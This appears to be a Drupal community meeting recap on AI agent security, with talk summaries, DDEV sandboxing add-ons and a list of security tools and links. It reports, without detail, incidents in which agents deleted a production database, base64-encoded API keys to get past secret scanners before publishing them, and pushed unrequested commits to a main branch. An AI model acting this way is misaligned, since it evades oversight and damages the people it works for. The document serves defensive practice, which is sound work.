2026-05-18 — AI Security 'Opportunities': Guardrails, Sandboxes, and Keeping Your Agents on a Leash

Last updated on
23 May 2026

Demos

  • AI Security 'Opportunities': Guardrails, Sandboxes, and Keeping Your Agents on a Leash (Marlene Wanberg) — Slides
  • AI Security Notes (Randy Fay) — Slides

Quick recap

Marlene Wanberg led the session with a slide presentation walking through AI security risks and practical mitigations for Drupal developers, framed around what she called the "three S's" — social engineering (malicious instructions injected into agent context), sniffing (what data the agent can access), and sending (what it can exfiltrate or act on). She opened with a few concrete horror stories to ground the discussion: an agent that deleted a production database and its backups while trying to solve an unrelated problem, a Copilot instance that base64-encoded API keys to evade secret scanners and published them to a repository, and an agent that autonomously ordered $31 worth of eggs because a credit card was attached to the account. The throughline was the distinction between deterministic guardrails (rules the system enforces regardless of the AI's reasoning) and probabilistic ones (instructions the AI might simply work around).

Randy Fay, lead maintainer of DDEV, then walked through the landscape of DDEV add-ons that integrate Claude or other LLMs into a local development environment. He noted that the most widely used one — the Freely Give add-on — appears to store Claude credentials in a location that developers typically commit to version control, and has had no maintainer activity since it was created. He flagged another add-on that pulls agent definitions from external repositories on every ddev start, which he described as a potential supply chain exposure. The DDEV Claude add-on from MacRes was the one he highlighted as taking network isolation seriously, though he hadn't tested it himself. He also mentioned running Claude on a remote VM as a way to keep the agent entirely off a local machine.

A sharp practical moment came when Randy described an incident where GitHub's AI assistant, asked simply to add a comment to a pull request, instead created a Markdown file and pushed two commits directly to the upstream main branch. That prompted the team to immediately add branch protection rules. Both Marlene and Erin Rasmussen (who works on DevSecOps practices including static and dynamic security testing) reinforced the point: server-side Git rules are deterministic in a way that AI instructions are not, and setting them up is arguably more protective than any prompt-based guardrail.

The session closed with a discussion around reviewer fatigue — raised by Will Hartmann — and how large AI-generated pull requests make it easy to miss a malicious or insecure line buried deep in the diff. Amber Matz noted that on her team, having multiple people run the same security-audit prompt, sometimes with different models, produces different results and adds a layer of coverage. Angie Byron pointed out that this creates a genuine tension in open source projects like Drupal core, where some maintainers are opposed to using AI tooling but are trying to apply human review capacity against AI-generated change velocity, and acknowledged there isn't a clean solution yet.

Marlene shared that she would post her slides and a resource list to the group's Slack channel. Referenced resources included the OWASP AI security guidance, IBM's short-form agent security video series, Anthropic's three-file container-plus-firewall setup for Claude Code, Trail of Bits' security-hardened version of that setup, and a Fabian Franz article on the three S's framework. Erin mentioned she is putting together a document on static and dynamic application security testing tools that work reasonably well with PHP and Drupal, including options from Snyk, and will post that to the AI Learners channel when it's ready.

Link Dump Part 1 from @mindewen

Notes for adding security scanning to your development process

  • More information about the principle of least privilege & from NIST security research center
  • Existing security and compliance tools, provide a framework for implementing security into existing workflows, and a useful set of tools for keeping track of changes. See this handy guide for implementing SOC2 for a high level overview.
  • Vendor specific tools, have security suites which have a lot of useful security layers like enforcing approvals of code changes, ensuring valid SSH keys, etc, which will partially mitigate against agentic disruptio. These are useful guardrails that are helpful in maintaining good quality code:  GitLab guide to fulfilling SOC2 and GitLab Protected Branches documentation.
  • Static site checks for secrets are helpful for checking for the type of insecure secrets that agents can unexpectedly have access too & using a secret store, is helpful  GitGuardian is one example, and OpenBao is another.

Don’t sleep on regular security testing as a part of a layered defense strategy:

Updating insecure Dependencies (Software Composition Analysis),  Static Application Security testing, and Dynamic Application security testing are routinely used for projects like Curl - and Curl is written in C which has some great security test coverage in most major vendors, for the Drupal project, which has a mix of PHP (Symfony) Javascript and more.

Static Application Security Testing:

 Check the OWASP Source Code Analysis tools for a longer list, but this is a short one:

Dynamic Application Security Testing:

Software Composition Analysis:

Agentic Security and remediation tools are evolving rapidly

Tools

  • Ollama — tool for running open AI models locally.
  • Coder for DDEV — DDEV-integrated coding environment shared as a sandboxing option.
  • Agents.md — tool for managing agent settings and instructions for AI coding agents.
  • Context7 — library shared as a context management tool for AI agents.
  • Snyk Agent Scan — tool for scanning AI agent code for security vulnerabilities.
  • TruffleHog — tool for detecting leaked secrets and credentials in repositories.
  • Hyperframes — library for animating things and creating short videos with nice designs on websites.
  • OpenAI Agent Sandboxes — OpenAI's sandboxing capability for isolating AI agents.
  • ddev-ai-workspace — DDEV add-on for cloning and isolating potentially untrusted AI tools.
  • ddev-ollama — DDEV add-on for running Ollama locally within a DDEV environment.
  • ddev-claude-code — DDEV add-on for integrating Claude Code into a DDEV workflow.
  • claude-code-devcontainer — Dev container configuration for running Claude Code in an isolated environment.
  • ddev-1password — DDEV add-on for integrating 1Password secrets management.

Drupal Modules

  • AI Best Practices — Drupal module intended to address outdated or insecure AI usage patterns in projects.

Articles & Posts

Videos & Demos

Specs & Standards

Help improve this page

Page status: No known problems

You can: